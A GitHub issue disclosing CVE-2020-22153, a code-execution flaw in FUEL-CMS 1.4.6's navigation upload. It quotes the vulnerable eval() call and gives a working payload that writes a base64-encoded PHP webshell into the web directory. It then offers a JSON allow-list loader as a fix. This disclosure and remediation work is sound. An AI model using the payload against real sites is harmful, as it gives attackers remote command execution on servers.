CVE-2020-22153: Code execution in navigation/upload · Issue #553 · daylightstudio/FUEL-CMS
File upload vulnerability in FUEL-CMS v1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file passed to the upload parameter of the navigation function.
The upload function, reached through `$this->fuel->navigation->upload($params)`:

```php
if (empty($file))
{
    return FALSE;
}
// strip any php tags
$file = str_replace('<?php', '', $file);
// run xss_clean on it
$file = xss_clean($file);
// now evaluate the string to get the nav array
@eval($file);
```
The uploaded content only has its `<?php` tags stripped and is then passed through `xss_clean()`; neither step prevents the string from being valid PHP, because `eval()` interprets its argument as PHP code directly, without needing an opening tag.
The code is then executed by `@eval($file);`.
So we can construct PHP code that writes a webshell into the web directory.
code:

```php
file_put_contents("aaaaaa.php", base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg=="));
```
Because the `<?php` tag is filtered, we base64-encode the command execution code.
Then upload the file.
Although an error is displayed, our code has already been executed, and the generated file can be seen in the web directory.
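The root cause above is that uploaded data is handed to `eval()`, so no amount of tag stripping or XSS filtering can make it safe. The following is an added example, not FUEL-CMS code, of how an import like this can be written without ever treating the upload as code: the navigation definition is accepted as JSON and validated against an allow-list of keys. The key names (`id`, `label`, `location`, `parent`) and size limits are assumptions chosen for illustration, not the project's own schema.

```php
<?php
// Added example (not FUEL-CMS code): a navigation-file loader that never
// calls eval(). The upload is parsed as JSON, which is data rather than
// code, and every item is checked against an allow-list before it is used.
//
// Assumptions: the navigation array is a list of items with an id, label,
// location and optional parent. These key names are illustrative, not the
// project's actual schema.

const NAV_ALLOWED_KEYS = ['id', 'label', 'location', 'parent'];
const NAV_MAX_ITEMS    = 500;
const NAV_MAX_BYTES    = 256 * 1024;

/**
 * Parse an uploaded navigation file safely.
 * Returns the validated array; throws on any malformed or unexpected input.
 */
function parse_nav_upload(string $file): array
{
    if ($file === '' || strlen($file) > NAV_MAX_BYTES) {
        throw new InvalidArgumentException('empty or oversized upload');
    }

    // json_decode() only ever produces arrays and scalars; nothing in the
    // upload can be interpreted as PHP. Depth is capped to bound parsing work.
    $data = json_decode($file, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($data) || count($data) > NAV_MAX_ITEMS) {
        throw new InvalidArgumentException('navigation must be a bounded list');
    }

    $clean = [];
    foreach ($data as $i => $item) {
        if (!is_array($item)) {
            throw new InvalidArgumentException("item $i is not an object");
        }
        // Reject unknown keys outright instead of trying to "clean" them.
        $unknown = array_diff(array_keys($item), NAV_ALLOWED_KEYS);
        if ($unknown) {
            throw new InvalidArgumentException(
                "item $i has unexpected keys: " . implode(',', $unknown));
        }
        foreach (['id', 'label', 'location'] as $required) {
            if (!isset($item[$required]) || !is_string($item[$required])) {
                throw new InvalidArgumentException("item $i: '$required' must be a string");
            }
        }
        // Locations are restricted to site-relative slugs or http(s) URLs.
        $loc = $item['location'];
        if (!preg_match('#^(https?://\S+|[A-Za-z0-9_\-/]+)$#', $loc)) {
            throw new InvalidArgumentException("item $i: bad location");
        }
        // Copy only the validated fields; anything else is dropped.
        $clean[] = [
            'id'       => $item['id'],
            'label'    => $item['label'],
            'location' => $loc,
            'parent'   => (isset($item['parent']) && is_string($item['parent']))
                              ? $item['parent'] : null,
        ];
    }
    return $clean;
}

// Constructed inputs: a legitimate navigation file, and a file carrying PHP
// source like the payload in the report. The second is rejected as invalid
// JSON before any byte of it could be treated as code.
$good = '[{"id":"home","label":"Home","location":"home"},'
      . '{"id":"about","label":"About","location":"about","parent":"home"}]';
$bad  = 'file_put_contents("aaaaaa.php", base64_decode("..."));';

var_dump(parse_nav_upload($good));
try {
    parse_nav_upload($bad);
} catch (JsonException $e) {
    echo "rejected: " . $e->getMessage() . PHP_EOL;
}
```

The design point is that the parser has no code path that evaluates input: a PHP payload fails at `json_decode()`, and a syntactically valid JSON file that smuggles extra keys or non-string values is rejected by the allow-list rather than "sanitized". If an existing deployment must keep accepting the legacy PHP-array format, the equivalent is to parse it with a restricted grammar (or `token_get_all()` with an allow-list of token types) and never to fall back to `eval()`.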